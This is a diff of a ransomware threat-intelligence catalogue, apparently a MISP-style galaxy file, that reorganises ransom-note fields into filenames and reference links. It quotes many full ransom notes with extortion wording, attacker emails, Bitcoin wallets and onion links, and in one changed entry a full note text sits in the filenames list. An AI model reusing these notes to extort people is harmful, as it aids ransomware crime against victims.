"ransomnotes-refs": [ + "https://pastebin.com/xkRaRytW" + ], "refs": [ "https://twitter.com/demonslay335/status/981270787905720320" ] @@ -11693,16 +11905,18 @@ ], "payment-method": "Bitcoin", "price": "1 200 yuan (180,81 $)", - "ransomnotes": [ - "https://pbs.twimg.com/media/DNIoIFuX4AAce7J.jpg", - "https://pbs.twimg.com/media/DNx5Of-X0AASVda.jpg", + "ransomnotes-filenames": [ "_@XiaoBa@_.bmp", "_@Explanation@_.hta", "_XiaoBa_Info_.hta", "_XiaoBa_Info_.bmp", - "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/De8WvF_X0AARtYr[1].jpg", "# # DECRYPT MY FILE # #.bmp" ], + "ransomnotes-refs": [ + "https://pbs.twimg.com/media/DNIoIFuX4AAce7J.jpg", + "https://pbs.twimg.com/media/DNx5Of-X0AASVda.jpg", + "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/De8WvF_X0AARtYr[1].jpg" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/xiaoba-ransomware-retooled-as-coinminer-but-manages-to-ruin-your-files-anyway/", "https://twitter.com/malwrhunterteam/status/923847744137154560", @@ -11727,7 +11941,9 @@ "payment-method": "Bitcoin", "price": "7000 $", "ransomnotes": [ - "Encrypted files! All your files are encrypted. Using AES256-bit encryption and RSA-2048-bit encryption. Making it impossible to recover files without the correct private key. If you are interested in getting is the key and recover your files You should proceed with the following steps. The only way to decrypt your files safely is to buy the Descrypt and Private Key software. Any attempts to restore your files with the third-party software will be fatal for your files! Important use Firefox or Chrome browser To proceed with the purchase you must access one of the link below https://lylh3uqyzay3lhrd.onion.to/ https://lylh3uqyzay3lhrd.onion.link/ If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser...", + "Encrypted files! All your files are encrypted. Using AES256-bit encryption and RSA-2048-bit encryption. Making it impossible to recover files without the correct private key. If you are interested in getting is the key and recover your files You should proceed with the following steps. The only way to decrypt your files safely is to buy the Descrypt and Private Key software. Any attempts to restore your files with the third-party software will be fatal for your files! Important use Firefox or Chrome browser To proceed with the purchase you must access one of the link below https://lylh3uqyzay3lhrd.onion.to/ https://lylh3uqyzay3lhrd.onion.link/ If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser..." + ], + "ransomnotes-refs": [ "https://sensorstechforum.com/wp-content/uploads/2018/04/stf-NMCRYPT-ransomware-virus-ransom-note-tor-onion-network-page-768x827.png" ], "refs": [ @@ -11744,9 +11960,11 @@ "payment-method": "Bitcoin", "price": "0.2", "ransomnotes": [ - "!HELP_YOUR_FILES.HTML", "We’re very sorry that all of your personal files have been encrypted :( But there are good news – they aren’t gone, you still have the opportunity to restore them! Statistically, the lifespan of a hard-drive is anywhere from 3 to 5 years. If you don’t make copies of important information, you could lose everything! Just imagine! In order to receive the program that will decrypt all of your files, you will need to pay a certain amount. But let’s start with something else…" ], + "ransomnotes-filenames": [ + "!HELP_YOUR_FILES.HTML" + ], "refs": [ "https://bartblaze.blogspot.lu/2018/04/maktub-ransomware-possibly-rebranded-as.html", "http://id-ransomware.blogspot.com/2018/04/ironlocker-ransomware.html" @@ -11762,7 +11980,7 @@ ], "payment-method": "Bitcoin", "price": "0.007305 - 0.05", - "ransomnotes": [ + "ransomnotes-refs": [ "https://pbs.twimg.com/media/DavxIr-W4AEq3Ny.jpg" ], "refs": [ @@ -11781,8 +11999,10 @@ ], "payment-method": "Bitcoin", "price": "0.14", - "ransomnotes": [ - "HOW DECRIPT FILES.hta", + "ransomnotes-filenames": [ + "HOW DECRIPT FILES.hta" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/ransomware/c/compiled-ransomware/ransom-note.jpg" ], "refs": [ @@ -11819,7 +12039,9 @@ "price": "2500 $", "ransomnotes": [ "SIGRUN 1.0 RANSOMWARE\n\nAll your important files are encrypted\n\nYour files has been encrypted by sigrun ransomware with unique decryption key.\n\nThere is only one way to get your files back: contact with us, pay, and get decryptor software. \n\nWe accept Bitcoin and Dash, you can find exchangers on https://www.bitcoin.com/buy-bitcoin and https://www.dash.org/exchanges/ and others.\n\nYou have unique idkey (in a yellow frame), write it in letter when contact with us.\n\nAlso you can decrypt 3 files for test, its guarantee what we can decrypt your files.\n\nIDKEY:\n>>> [id_key] <<<\nContact information:\n\nemail: sigrun_decryptor@protonmail.ch", - "~~~~~~SIGRUN 1.0 RANSOMWARE~~~~~~~~~\n\nAttention! \n\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .sigrun\n\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files. \n\nBut don't worry! You still can restore it!\n\nIn order to restore it you need to contact with us via e-mail.\n\n-----------------------------------------------\n|Our e-mail is: sigrun_decryptor@protonmail.ch|\n-----------------------------------------------\n\nAs a proof we will decrypt 3 files for free!\n\nPlease, attach this to your message:\n[id_key]", + "~~~~~~SIGRUN 1.0 RANSOMWARE~~~~~~~~~\n\nAttention! \n\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .sigrun\n\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files. \n\nBut don't worry! You still can restore it!\n\nIn order to restore it you need to contact with us via e-mail.\n\n-----------------------------------------------\n|Our e-mail is: sigrun_decryptor@protonmail.ch|\n-----------------------------------------------\n\nAs a proof we will decrypt 3 files for free!\n\nPlease, attach this to your message:\n[id_key]" + ], + "ransomnotes-filenames": [ "RESTORE-SIGRUN.html", "RESTORE-SIGRUN.txt" ], @@ -11838,7 +12060,7 @@ ".crybrazil" ], "payment-method": "Website", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/crybrazil.jpg" ], "refs": [ @@ -11855,7 +12077,7 @@ "meta": { "payment-method": "Bitcoin", "price": "0.0065 (50 $)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/De00yEDVQAE_p9z[1].jpg" ], "refs": [ @@ -11873,8 +12095,10 @@ ".DiskDoctor" ], "payment-method": "Bitcoin Email", - "ransomnotes": [ - "HOW TO RECOVER ENCRYPTED FILES.TXT", + "ransomnotes-filenames": [ + "HOW TO RECOVER ENCRYPTED FILES.TXT" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/De2sj4GW0AAuQer[1].jpg" ], "refs": [ @@ -11896,7 +12120,7 @@ ], "payment-method": "Bitcoin", "price": "0.1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/DfCO0T2WsAQvclJ[1].jpg" ], "refs": [ @@ -11922,15 +12146,19 @@ "payment-method": "Bitcoin", "price": "100 - 500", "ransomnotes": [ - "#RECOVERY-PC#.txt", "==========================# aurora ransomware #==========================\n\nSORRY! Your files are encrypted.\nFile contents are encrypted with random key.\nWe STRONGLY RECOMMEND you NOT to use any \"decryption tools\".\nThese tools can damage your data, making recover IMPOSSIBLE.\nAlso we recommend you not to contact data recovery companies.\nThey will just contact us, buy the key and sell it to you at a higher price.\nIf you want to decrypt your files, you have to get RSA private key.\nIn order to get private key, write here:\nbig.fish@vfemail.net\nAnd send me your id, your id:\n[redacted]\nAnd pay 200$ on 1GSbmCoKzkHVkSUxqdSH5t8SxJQVnQCeYf wallet\nIf someone else offers you files restoring, ask him for test decryption.\n Only we can successfully decrypt your files; knowing this can protect you from fraud.\nYou will receive instructions of what to do next.\n==========================# aurora ransomware #==========================", - "!-GET_MY_FILES-!.txt", - "@_RESTORE-FILES_@.txt", "%UserProfile%wall.i", - "https://www.bleepstatic.com/images/news/ransomware/a/aurora/ransom-note.jpg", - "https://www.bleepstatic.com/images/news/ransomware/a/aurora/wallpaper.jpg", "==========================# zorro ransomware #==========================\nSORRY! Your files are encrypted.\nFile contents are encrypted with random key.\nRandom key is encrypted with RSA public key (2048 bit)\n.We STRONGLY RECOMMEND you NOT to use any \"decryption tools\".\nThese tools can damage your data, making recover IMPOSSIBLE.\nAlso we recommend you not to contact data recovery companies.\nThey will just contact us, buy the key and sell it to you at a higher price.\nIf you want to decrypt your files, you need to get the RSA-key from us.\n--\nTo obtain an RSA-key, follow these steps in order:\n1. pay this sum 500$ to this BTC-purse: 18sj1xr86c3YHK44Mj2AXAycEsT2QLUFac\n2. write on the e-mail ochennado@tutanota.com or anastacialove21@mail.com indicating in the letter this ID-[id] and BTC-purse, from which paid.\nIn the reply letter you will receive an RSA-key and instructions on what to do next.\nWe guarantee you the recovery of files, if you do it right.\n==========================# zorro ransomware #==========================" ], + "ransomnotes-filenames": [ + "#RECOVERY-PC#.txt", + "!-GET_MY_FILES-!.txt", + "@_RESTORE-FILES_@.txt" + ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/a/aurora/ransom-note.jpg", + "https://www.bleepstatic.com/images/news/ransomware/a/aurora/wallpaper.jpg" + ], "refs": [ "https://www.spamfighter.com/News-21588-Aurora-Ransomware-Circulating-the-Cyber-Space.htm", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/", @@ -11952,7 +12180,7 @@ ], "payment-method": "Bitcoin", "price": "500 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/8/pgpsnippet-variant.jpg", "http://id-ransomware.blogspot.com/2018/05/pgpsnippet-ransomware.html" ], @@ -11985,7 +12213,7 @@ ], "payment-method": "Bitcoin", "price": "100 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/june/15/DfQI_lnXUAAukGK[1].jpg" ], "refs": [ @@ -12018,7 +12246,7 @@ "_V.0.0.0.1{paradise@all-ransomware.info}.prt" ], "payment-method": "Bitcoin Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "PARADISE_README_paradise@all-ransomware.info.txt" ], "refs": [ @@ -12041,10 +12269,12 @@ "price": "0.1 - 0.3", "ransomnotes": [ "Your files were encrypted with AES-256.\n\nAsk how to restore your files by email reycarnasi1983@protonmail.com\n\nUse only gmail.com, yahoo.com, protonmail.com.\nMessages written from other mail services we can not get.\n\nWe always respond to messages. If there is no answer within 24 hours, then write us with another email service.\n\n[OR]\n\nIf within 24 hours you have not received a response, you need to follow the following instructions:\n\na) Download and install TOR browser: https://www.torproject.org/download/download-easy.html.en\nb) From the TOR browser, follow the link: torbox3uiot6wchz.onion\nc) Register your e-mail (Sign Up)\nd) Write us on e-mail: reycarnasi1983@torbox3uiot6wchz.onion\nATTENTION: e-mail (reycarnasi1983@torbox3uiot6wchz.onion) accepts emails, only with e-mail registered in the TOR browser at torbox3uiot6wchz.onion\n\n################################\n\nAny actions on your part over encrypted files can damage them. Be sure to make backups!\n\n################################\n\nIn the message write us this ID:\n[redacted base64]-----END KEY-----", - "ScrewYou.txt", - "Readme.txt", "Your files were encrypted with AES-256.\n\nAsk how to restore your files by email ssananunak1987@protonmail.com\n\nUse only gmail.com, yahoo.com, protonmail.com.\nMessages written from other mail services we can not get.\n\nWe always respond to messages. If there is no answer within 24 hours, then write us with another email service.\n\n[OR]\n\nIf within 24 hours you have not received a response, you need to follow the following instructions:\n\na) Download and install TOR browser: https://www.torproject.org/download/download-easy.html.en\nb) From the TOR browser, follow the link: torbox3uiot6wchz.onion\nc) Register your e-mail (Sign Up)\nd) Write us on e-mail: ssananunak1987@torbox3uiot6wchz.onion\nATTENTION: e-mail (ssananunak1987@torbox3uiot6wchz.onion) accepts emails, only with e-mail registered in the TOR browser at torbox3uiot6wchz.onion\n\n################################\n\nAny actions on your part over encrypted files can damage them. Be sure to make backups!\n\n################################\n\nIn the message write us this ID:\n[redacted base64]" ], + "ransomnotes-filenames": [ + "ScrewYou.txt", + "Readme.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1006220895302705154", "https://id-ransomware.blogspot.com/2018/03/b2dr-ransomware.html" @@ -12061,9 +12291,11 @@ ], "payment-method": "Email Tor", "ransomnotes": [ - "Readme.txt", "Hello. Your files have been encrypted.\n\nFor help, write to this e-mail: codyprince92@mail.com\nAttach to the letter 1-2 files (no more than 3 MB) and your personal key.\n\n\nIf within 24 hours you have not received a response, you need to follow the following instructions:\n\n\na) Download and install TOR browser: https://www.torproject.org/download/download-easy.html.en\nb) From the TOR browser, follow the link: torbox3uiot6wchz.onion\nc) Register your e-mail (Sign Up)\nd) Write us on e-mail: codyprince@torbox3uiot6wchz.onion\n\n\nATTENTION: e-mail (codyprince@torbox3uiot6wchz.onion) accepts emails, only with e-mail registered in the TOR browser at torbox3uiot6wchz.onion\n\n\n\nYour personal key:\n\n[redacted hex]" ], + "ransomnotes-filenames": [ + "Readme.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1006237353474756610", "http://id-ransomware.blogspot.com/2017/05/yyto-ransomware.html" @@ -12079,9 +12311,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "Notice.txt", "Your files was encrypted using AES-256 algorithm. Write me to e-mail: qnbqwqe@protonmail.com to get your decryption key.\nYour USERKEY: [redacted 1024 bytes in base64]" ], + "ransomnotes-filenames": [ + "Notice.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1007334654918250496" ] @@ -12099,7 +12333,7 @@ ], "payment-method": "Bitcoin", "price": "3003 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsoIB_0U0AAXgEz[1].jpg" ], "refs": [ @@ -12140,8 +12374,12 @@ "payment-method": "Bitcoin", "price": "1", "ransomnotes": [ - "_How_to_decrypt_files.txt", - "Some files have been encrypted\nPlease send ( 1 ) bitcoins to my wallet address\nIf you paid, send the machine code to my email\nI will give you the key\nIf there is no payment within three days,\nwe will no longer support decryption\nIf you exceed the payment time, your data will be open to the public download\nWe support decrypting the test file.\nSend three small than 3 MB files to the email address\n\nBTC Wallet : [redacted]\nEmail: dbger@protonmail.com\nYour HardwareID:", + "Some files have been encrypted\nPlease send ( 1 ) bitcoins to my wallet address\nIf you paid, send the machine code to my email\nI will give you the key\nIf there is no payment within three days,\nwe will no longer support decryption\nIf you exceed the payment time, your data will be open to the public download\nWe support decrypting the test file.\nSend three small than 3 MB files to the email address\n\nBTC Wallet : [redacted]\nEmail: dbger@protonmail.com\nYour HardwareID:" + ], + "ransomnotes-filenames": [ + "_How_to_decrypt_files.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/u/986406/Ransomware/DBGer/DBGer-ransom-note.png" ], "refs": [ @@ -12214,9 +12452,11 @@ "payment-method": "Bitcoin", "price": "300 $", "ransomnotes": [ - "!!!KEYPASS_DECRYPTION_INFO!!!.txt", "Attention!\n\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KEYPASS\n\nThe only method of recovering files is to purchase an decrypt software and unique private key.\n\nAfter purchase you will start decrypt software, enter your unique private key and it will decrypt all your data.\n\nOnly we can give you this key and only we can recover your files.\n\nYou need to contact us by e-mail keypass@bitmessage.ch send us your personal ID and wait for further instructions.\n\nFor you to be sure, that we can decrypt your files - you can send us a 1-3 any not very big encrypted files and we will send you back it in a original form FREE.\n\nPrice for decryption $300.\n\nThis price avaliable if you contact us first 72 hours.\n\nE-mail address to contact us:\n\nkeypass@bitmessage.ch\n\n\n\nReserve e-mail address to contact us:\n\nkeypass@india.com\n\n\n\nYour personal id:\n[id]" ], + "ransomnotes-filenames": [ + "!!!KEYPASS_DECRYPTION_INFO!!!.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/new-keypass-ransomware-campaign-underway/", "https://www.kaspersky.com/blog/keypass-ransomware/23447/" @@ -12238,9 +12478,11 @@ ], "payment-method": "Bitcoin", "price": "200 - 600 $", - "ransomnotes": [ + "ransomnotes-filenames": [ + "!readme.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsW33OQXgAAwJzv[1].jpg", - "!readme.txt", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsobVENXcAAR3GC[1].jpg" ], "refs": [ @@ -12258,9 +12500,11 @@ "meta": { "payment-method": "Bitcoin", "ransomnotes": [ - "https://www.bleepstatic.com/images/news/ransomware/b/barack-obama-ransomware/barack-obama-everlasting-blue-blackmail-virus.jpg", "Hello, your computer is encrypted by me! Yeah, that means your EXE file isn't open! Because I encrypted it.\nSo you can decrypt it, but you have to tip it. This is a big thing. You can email this email: 2200287831@qq.com gets more information." ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/b/barack-obama-ransomware/barack-obama-everlasting-blue-blackmail-virus.jpg" + ], "refs": [ "https://twitter.com/malwrhunterteam/status/1032242391665790981", "https://www.bleepingcomputer.com/news/security/barack-obamas-blackmail-virus-ransomware-only-encrypts-exe-files/", @@ -12282,8 +12526,10 @@ ], "payment-method": "Bitcoin", "price": "200 $", - "ransomnotes": [ - "CRYPTONAR RECOVERY INFORMATION.txt", + "ransomnotes-filenames": [ + "CRYPTONAR RECOVERY INFORMATION.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/ransom-note.jpg" ], "refs": [ @@ -12340,8 +12586,12 @@ "payment-method": "Bitcoin", "price": "0.5", "ransomnotes": [ - "IMPORTANT ABOUT DECRYPT.txt", - "L!W2Be%BS4\nWARNING!! YOU ARE SO F*UCKED!!!\n\nYour Files Has Encrypted\n\nWhat happened to your files?\nAll of your files were protected by a strong encryptation\nThere is no way to decrypt your files without the key.\nIf your files not important for you just reinstall your system.\nx§If your files is important just email us to discuss the the price and how to decrypt your files.\n\nYou can email us to omg-help-me@openmailbox.org\n\nWe accept just BITCOIN if you don´t know what it is just google it.\nWe will give instructions where and how you buy bitcoin in your country.\nPrice depends on how important your files and network is.\nIt could be 0.5 bitcoin to 25 bitcoin.\nYou can send us a encrypted file for decryption.\nFell free to email us with your country, computer name and username of the infected system.", + "L!W2Be%BS4\nWARNING!! YOU ARE SO F*UCKED!!!\n\nYour Files Has Encrypted\n\nWhat happened to your files?\nAll of your files were protected by a strong encryptation\nThere is no way to decrypt your files without the key.\nIf your files not important for you just reinstall your system.\nx§If your files is important just email us to discuss the the price and how to decrypt your files.\n\nYou can email us to omg-help-me@openmailbox.org\n\nWe accept just BITCOIN if you don´t know what it is just google it.\nWe will give instructions where and how you buy bitcoin in your country.\nPrice depends on how important your files and network is.\nIt could be 0.5 bitcoin to 25 bitcoin.\nYou can send us a encrypted file for decryption.\nFell free to email us with your country, computer name and username of the infected system." + ], + "ransomnotes-filenames": [ + "IMPORTANT ABOUT DECRYPT.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlpDe-kXsAA2lmH[1].jpg" ], "refs": [ @@ -12358,7 +12608,7 @@ "meta": { "payment-method": "Bitcoin", "price": "80 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dlq8W3FXoAAYR1v[1].jpg" ], "refs": [ @@ -12380,7 +12630,7 @@ ], "payment-method": "Bitcoin", "price": "100 - 500 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlraMbTWwAA_367[1].jpg" ], "refs": [ @@ -12399,10 +12649,12 @@ ], "payment-method": "Bitcoin", "price": "100 $", - "ransomnotes": [ - "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dl2M9kdX0AAcGbJ[1].jpg", + "ransomnotes-filenames": [ "README.txt" ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/Dl2M9kdX0AAcGbJ[1].jpg" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/", "https://twitter.com/siri_urz/status/1035138577934557184" @@ -12419,11 +12671,13 @@ "meta": { "payment-method": "Bitcoin", "price": "400 $", - "ransomnotes": [ + "ransomnotes-filenames": [ + "ReadMe.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/ransom-note-html-part_01.jpg", "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/ransom-note-html-part_02.jpg", - "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/payment-portal.jpg", - "ReadMe.txt" + "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/payment-portal.jpg" ], "refs": [ "https://www.bleepingcomputer.com/news/security/sigma-ransomware-being-distributed-using-fake-craigslist-malspam/" @@ -12456,7 +12710,7 @@ "meta": { "payment-method": "Dollars", "price": "80", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/security/f/fallout-exploit-kit/savefiles/ransom-note-red.jpg" ], "refs": [ @@ -12475,8 +12729,10 @@ ".SAVEfiles." ], "payment-method": "Email", - "ransomnotes": [ - "!!!SAVE__FILES__INFO!!!.txt", + "ransomnotes-filenames": [ + "!!!SAVE__FILES__INFO!!!.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/security/f/fallout-exploit-kit/savefiles/ransom-note-red.jpg" ], "refs": [ @@ -12495,10 +12751,14 @@ "payment-method": "Won", "price": "50 000 (50 $)", "ransomnotes": [ - "Warning!!!!!!.txt", - "https://www.bleepstatic.com/images/news/ransomware/f/file-locker/ransom-note%20-%20Copy.jpg", "한국어: 경고!!! 모든 문서, 사진, 데이테베이스 및 기타 중요한 파일이 암호화되었습니다!!\n당신은 돈을 지불해야 합니다\n비트코인 5만원을 fasfry2323@naver.com로 보내십시오 비트코인 지불코드: 1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX 결제 사이트 http://www.localbitcoins.com/ \nEnglish: Warning!!! All your documents, photos, databases and other important personal files were encrypted!!\nYou have to pay for it.\nSend fifty thousand won to fasfry2323@naver.com Bitcoin payment code: 1BoatSLRHtKNngkdXEeobR76b53LETtpyT Payment site http://www.localbitcoins.com/" ], + "ransomnotes-filenames": [ + "Warning!!!!!!.txt" + ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/f/file-locker/ransom-note%20-%20Copy.jpg" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/file-locker-ransomware-targets-korean-victims-and-asks-for-50k-won/" ] @@ -12515,10 +12775,14 @@ "payment-method": "Bitcoin", "price": "0.1", "ransomnotes": [ - "DECRYPTING.txt", - "https://www.bleepstatic.com/images/news/ransomware/c/CommonRansom/ransom-note.jpg", "+-----------------------+\n¦----+CommonRansom+-----¦\n+-----------------------+\nHello dear friend,\nYour files were encrypted!\nYou have only 12 hours to decrypt it\nIn case of no answer our team will delete your decryption password\nWrite back to our e-mail: old@nuke.africa\n\n\nIn your message you have to write:\n1. This ID-[VICTIM_ID]\n2. [IP_ADDRESS]:PORT(rdp) of infected machine\n3. Username:Password with admin rights\n4. Time when you have paid 0.1 btc to this bitcoin wallet:\n35M1ZJhTaTi4iduUfZeNA75iByjoQ9ibgF\n\n\nAfter payment our team will decrypt your files immediatly\n\n\nFree decryption as guarantee:\n1. File must be less than 10MB\n2. Only .txt or .lnk files, no databases\n3. Only 5 files\n\n\nHow to obtain bitcoin:\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\nhttps://localbitcoins.com/buy_bitcoins\nAlso you can find other places to buy Bitcoins and beginners guide here:\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/" ], + "ransomnotes-filenames": [ + "DECRYPTING.txt" + ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/c/CommonRansom/ransom-note.jpg" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/commonransom-ransomware-demands-rdp-access-to-decrypt-files/" ] @@ -12550,9 +12814,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "readmy.txt", "Attention! All your files are encrypted!\nTo recover your files and access them,\nsend a message with your id to email DecryptFox@protonmail.com\n \nPlease note when installing or running antivirus will be deleted\n important file to decrypt your files and data will be lost forever!!!!\n \nYou have 5 attempts to enter the code. If you exceed this\nthe number, all the data, will be irreversibly corrupted. Be\ncareful when entering the code!\n \nyour id [redacted 32 lowercase hex]" ], + "ransomnotes-filenames": [ + "readmy.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/", "https://twitter.com/demonslay335/status/1049325784979132417" @@ -12569,7 +12835,7 @@ ], "payment-method": "Bitcoin", "price": "780 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "#RECOVERY_FILES#.txt" ], "refs": [ @@ -12588,7 +12854,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/september/14/mvp.jpg" ], "refs": [ @@ -12605,9 +12871,11 @@ "payment-method": "Bitcoin", "price": "0.8", "ransomnotes": [ - "read_me_for_recover_your_files.txt", "All your important files on this device have been encrypted.\n\nNo one can decrypt your files except us.\n\nIf you want to recover all your files. contact us via E-mail.\nDON'T forget to send us your ID!!!\n\nTo recover your files,You have to pay 0.8 bitcoin.\n\n\n\n\nContact Email : Leviathan13@protonmail.com\n\nYour ID :\n\n[redacted 0x200 bytes in base64 form]\n\n\nFree decryption as guarantee\n\nIf you can afford the specified amount of bitcoin,\nyou can send to us up to 2 files for demonstration.\n\nPlease note that files must NOT contain valuable information\nand their total size must be less than 2Mb." ], + "ransomnotes-filenames": [ + "read_me_for_recover_your_files.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/", "" @@ -12638,7 +12906,7 @@ ], "payment-method": "Bitcoin", "price": "0.002 (50 $)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/9/moira.jpg" ], "refs": [ @@ -12661,9 +12929,11 @@ "payment-method": "Bitcoin", "price": "25 000 sek (sweden)", "ransomnotes": [ - "aboutYourFiles.txt", "Hi. Thank you for using my program. If you're reading this, a lot of your files have\nbeen encrypted. To decrypt them, you need my decryption program. For this, I want 25 000 sek, I want\nthem in bitcoin. Email me when you've paid with details about the transaction. I'll give you two days.\nIf you have not paid in two days(from the day you received the email), It will cost 1000 sek more per day.\n If I have not heard from you after five days (from the day you received the email), I assume your files are not that\nimportant to you. So I'll delete your decryption-key, and you will never see your files again.\n\n\nAfter the payment, email me the following information:\n* the bitcoin address you sent from (important, write it down when you do the transaction)\n* the ID at the bottom of this document (this is important!! Otherwise I don't know which key belongs\nto you).\nThen I will send you the decryption-program and provide you with instructions of how to remove\nthe virus if you have not already figured it out.\n\n\nEmail:\naperfectday2018@protonmail.com\n\nBitcoin adress: \n1LX3tBkW161hoF5DbGzbrm3sdXaF6XHv2D\n\nMake sure to get the bitcoin adress right, copy and paste and double check. If you send the bitcoin\nto the wrong adress, it will be lost forever. You cant stop or regret a bitcoin transaction.\n\n\nIMPORTANT: \n\nDo not loose this document. You also have a copy of it on your desktop.\nDo NOT change any filenames!!! !!!\n\n\nThank you for the money, it means a lot to me. \n\n\n\nID: [redacted 13 numbers]" ], + "ransomnotes-filenames": [ + "aboutYourFiles.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1059470985055875074", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/" @@ -12679,9 +12949,11 @@ ], "payment-method": "Bitcoin", "price": "300 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "how to get back you files.txt", - "Attention MOTHERFUCKER!\n\nAll your main files were encrypted!\n\nYour personal files (documents, databases, jpeg, docx, doc,\netc.) were encrypted, their further using impossible.\nTO DECRYPT YOUR FILES YOU NEED TO BUY A SOFTWARE WITH YOUR UNIQUE PRIVATE KEY. ONLY OUR\nSOFTWARE WILL ALLOW YOU DECRYPT YOUR FILES.\nNOTE:\nYou have only 6 hours from the moment when an encryption was done to buy our software at $300, in bitcoin\nYou all files will get deleted after the lapse of 6 hours.\nAny attempts to remove this encryption will be unsuccessful. You cannot do this without our software with your key.\nDo not send any emails with threats and rudeness to us. Example of email format: Hi, I need a decryption of my files.\n\nBitcoin address = 1GstvLM6SumX3TMMgN9PvXQsEy3FR9ZqWX\n\nContact us by email only: ayaan321308@gmail.com", + "Attention MOTHERFUCKER!\n\nAll your main files were encrypted!\n\nYour personal files (documents, databases, jpeg, docx, doc,\netc.) were encrypted, their further using impossible.\nTO DECRYPT YOUR FILES YOU NEED TO BUY A SOFTWARE WITH YOUR UNIQUE PRIVATE KEY. ONLY OUR\nSOFTWARE WILL ALLOW YOU DECRYPT YOUR FILES.\nNOTE:\nYou have only 6 hours from the moment when an encryption was done to buy our software at $300, in bitcoin\nYou all files will get deleted after the lapse of 6 hours.\nAny attempts to remove this encryption will be unsuccessful. You cannot do this without our software with your key.\nDo not send any emails with threats and rudeness to us. Example of email format: Hi, I need a decryption of my files.\n\nBitcoin address = 1GstvLM6SumX3TMMgN9PvXQsEy3FR9ZqWX\n\nContact us by email only: ayaan321308@gmail.com" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/DrkmCriWwAMCdqF.jpg" ], "refs": [ @@ -12698,7 +12970,7 @@ ".Vapor" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/vapor.jpg" ], 